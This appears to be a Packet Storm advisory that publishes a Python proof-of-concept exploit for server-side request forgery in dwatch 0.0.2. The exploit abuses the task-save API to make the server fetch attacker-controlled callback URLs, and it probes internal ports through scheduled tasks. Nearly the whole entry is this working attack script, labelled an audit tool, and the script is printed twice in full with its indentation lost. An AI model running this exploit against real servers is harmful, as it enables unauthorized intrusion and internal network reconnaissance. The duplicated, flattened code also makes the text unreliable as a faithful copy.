Description
This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...
Basic Information
ID
PACKETSTORM:222328
Published
Jun 1, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================
[+] Summary : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
[+] POC :
#!/usr/bin/env python3
import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
logger = logging.getLogger("DWatchAuditor")
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class DWatchAuditorCore:
"""Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions."""
def __init__(self, target: str, callback_host: Optional[str] = None,
callback_port: int = 8888, verbose: bool = False):
parsed = urlparse(target if "://" in target else f"http://{target}")
if not parsed.netloc:
raise ValueError(f"Invalid target URL structure: {target}")
path = parsed.path if parsed.path else ""
self.base_url = f"{parsed.scheme}://{parsed.netloc}{path}".rstrip("/")
self.callback_host = callback_host
self.callback_port = callback_port
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
'Content-Type': 'application/json'
})
self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
self.created_tasks: List[Dict] = []
self.callback_event = threading.Event()
self.callback_data: List[Dict] = []
self.lock = threading.Lock()
def _get_local_ip(self) -> str:
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception:
return "127.0.0.1"
def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
payload = {"name": name, "url": payload_url, "spec": spec}
try:
if self.verbose:
logger.info(f"Submitting audit payload: {name} -> {payload_url}")
response = self.session.post(self.save_endpoint, json=payload, timeout=10)
if response.status_code == 200 and response.text:
logger.info(f"Audit task '{name}' registered successfully.")
self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
return True
logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
return False
except requests.RequestException as e:
logger.error(f"Network transport error during task creation: {e}")
return False
def verify_boundary_leak(self) -> bool:
if not self.callback_host:
self.callback_host = self._get_local_ip()
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
logger.info(f"Callback URL: {callback_url}")
self.callback_event.clear()
server_thread = threading.Thread(target=self._run_callback_socket)
server_thread.daemon = True
server_thread.start()
time.sleep(0.5)
task_name = f"Boundary_Audit_{timestamp}"
if self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
logger.info("Waiting for inbound connection (timeout 12s)...")
triggered = self.callback_event.wait(timeout=12)
if triggered:
logger.critical("SSRF outbound boundary breach confirmed!")
self.callback_event.set()
server_thread.join(timeout=1)
return True
else:
logger.warning("No inbound request captured.")
self.callback_event.set()
server_thread.join(timeout=1)
return False
return False
def _run_callback_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server_socket.bind(("0.0.0.0", self.callback_port))
server_socket.listen(1)
server_socket.settimeout(12)
while not self.callback_event.is_set():
try:
client, addr = server_socket.accept()
self.callback_event.set()
raw_request = client.recv(2048).decode("utf-8", errors="ignore")
with self.lock:
self.callback_data.append({"sender": addr, "raw": raw_request})
logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")
try:
client.sendall(
b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
)
finally:
client.close()
except socket.timeout:
continue
except Exception as e:
logger.error(f"Callback listener error: {e}")
finally:
server_socket.close()
def check_internal_service(self, host: str, port: int) -> Dict:
url = f"http://{host}:{port}/"
task_name = f"service_recon_{port}_{int(time.time())}"
success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")
return {
"port": port,
"task_accepted": success,
"inference": (
"Task submitted - requires log verification"
if success else "Blocked or unreachable endpoint"
)
}
class InteractiveConsoleInterface:
"""User interface"""
def __init__(self, auditor: DWatchAuditorCore):
self.auditor = auditor
def display_menu(self):
while True:
print("\n" + "=" * 50)
print("dwatch SSRF Boundary Auditor")
print("=" * 50)
print("1. Run SSRF Test")
print("2. Check Internal Port")
print("3. Create Task")
print("4. View Tasks")
print("5. Exit")
choice = input("> ").strip()
if choice == "1":
self.auditor.verify_boundary_leak()
elif choice == "2":
host = input("Host: ").strip() or "127.0.0.1"
try:
port = int(input("Port: ").strip())
except ValueError:
print("Invalid port")
continue
print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))
elif choice == "3":
name = input("Task name: ").strip()
url = input("URL: ").strip()
self.auditor.create_audit_task(name, url)
elif choice == "4":
print(json.dumps(self.auditor.created_tasks, indent=2))
elif choice == "5":
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True)
parser.add_argument("-c", "--callback")
parser.add_argument("-i", "--interactive", action="store_true")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
callback_host = None
callback_port = 8888
if args.callback:
parts = args.callback.rsplit(":", 1)
callback_host = parts[0]
if len(parts) == 2:
callback_port = int(parts[1])
try:
auditor = DWatchAuditorCore(
target=args.target,
callback_host=callback_host,
callback_port=callback_port,
verbose=args.verbose
)
if args.interactive:
InteractiveConsoleInterface(auditor).display_menu()
else:
logger.info("Running SSRF boundary check...")
auditor.verify_boundary_leak()
except Exception as e:
logger.critical(f"Fatal error: {e}")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================
[+] Summary : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
[+] POC :
#!/usr/bin/env python3
import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
logger = logging.getLogger("DWatchAuditor")
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class DWatchAuditorCore:
"""Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions."""
def __init__(self, target: str, callback_host: Optional[str] = None,
callback_port: int = 8888, verbose: bool = False):
parsed = urlparse(target if "://" in target else f"http://{target}")
if not parsed.netloc:
raise ValueError(f"Invalid target URL structure: {target}")
path = parsed.path if parsed.path else ""
self.base_url = f"{parsed.scheme}://{parsed.netloc}{path}".rstrip("/")
self.callback_host = callback_host
self.callback_port = callback_port
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
'Content-Type': 'application/json'
})
self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
self.created_tasks: List[Dict] = []
self.callback_event = threading.Event()
self.callback_data: List[Dict] = []
self.lock = threading.Lock()
def _get_local_ip(self) -> str:
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception:
return "127.0.0.1"
def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
payload = {"name": name, "url": payload_url, "spec": spec}
try:
if self.verbose:
logger.info(f"Submitting audit payload: {name} -> {payload_url}")
response = self.session.post(self.save_endpoint, json=payload, timeout=10)
if response.status_code == 200 and response.text:
logger.info(f"Audit task '{name}' registered successfully.")
self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
return True
logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
return False
except requests.RequestException as e:
logger.error(f"Network transport error during task creation: {e}")
return False
def verify_boundary_leak(self) -> bool:
if not self.callback_host:
self.callback_host = self._get_local_ip()
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
logger.info(f"Callback URL: {callback_url}")
self.callback_event.clear()
server_thread = threading.Thread(target=self._run_callback_socket)
server_thread.daemon = True
server_thread.start()
time.sleep(0.5)
task_name = f"Boundary_Audit_{timestamp}"
if self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
logger.info("Waiting for inbound connection (timeout 12s)...")
triggered = self.callback_event.wait(timeout=12)
if triggered:
logger.critical("SSRF outbound boundary breach confirmed!")
self.callback_event.set()
server_thread.join(timeout=1)
return True
else:
logger.warning("No inbound request captured.")
self.callback_event.set()
server_thread.join(timeout=1)
return False
return False
def _run_callback_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server_socket.bind(("0.0.0.0", self.callback_port))
server_socket.listen(1)
server_socket.settimeout(12)
while not self.callback_event.is_set():
try:
client, addr = server_socket.accept()
self.callback_event.set()
raw_request = client.recv(2048).decode("utf-8", errors="ignore")
with self.lock:
self.callback_data.append({"sender": addr, "raw": raw_request})
logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")
try:
client.sendall(
b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
)
finally:
client.close()
except socket.timeout:
continue
except Exception as e:
logger.error(f"Callback listener error: {e}")
finally:
server_socket.close()
def check_internal_service(self, host: str, port: int) -> Dict:
url = f"http://{host}:{port}/"
task_name = f"service_recon_{port}_{int(time.time())}"
success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")
return {
"port": port,
"task_accepted": success,
"inference": (
"Task submitted - requires log verification"
if success else "Blocked or unreachable endpoint"
)
}
class InteractiveConsoleInterface:
"""User interface"""
def __init__(self, auditor: DWatchAuditorCore):
self.auditor = auditor
def display_menu(self):
while True:
print("\n" + "=" * 50)
print("dwatch SSRF Boundary Auditor")
print("=" * 50)
print("1. Run SSRF Test")
print("2. Check Internal Port")
print("3. Create Task")
print("4. View Tasks")
print("5. Exit")
choice = input("> ").strip()
if choice == "1":
self.auditor.verify_boundary_leak()
elif choice == "2":
host = input("Host: ").strip() or "127.0.0.1"
try:
port = int(input("Port: ").strip())
except ValueError:
print("Invalid port")
continue
print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))
elif choice == "3":
name = input("Task name: ").strip()
url = input("URL: ").strip()
self.auditor.create_audit_task(name, url)
elif choice == "4":
print(json.dumps(self.auditor.created_tasks, indent=2))
elif choice == "5":
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True)
parser.add_argument("-c", "--callback")
parser.add_argument("-i", "--interactive", action="store_true")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
callback_host = None
callback_port = 8888
if args.callback:
parts = args.callback.rsplit(":", 1)
callback_host = parts[0]
if len(parts) == 2:
callback_port = int(parts[1])
try:
auditor = DWatchAuditorCore(
target=args.target,
callback_host=callback_host,
callback_port=callback_port,
verbose=args.verbose
)
if args.interactive:
InteractiveConsoleInterface(auditor).display_menu()
else:
logger.info("Running SSRF boundary check...")
auditor.verify_boundary_leak()
except Exception as e:
logger.critical(f"Fatal error: {e}")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================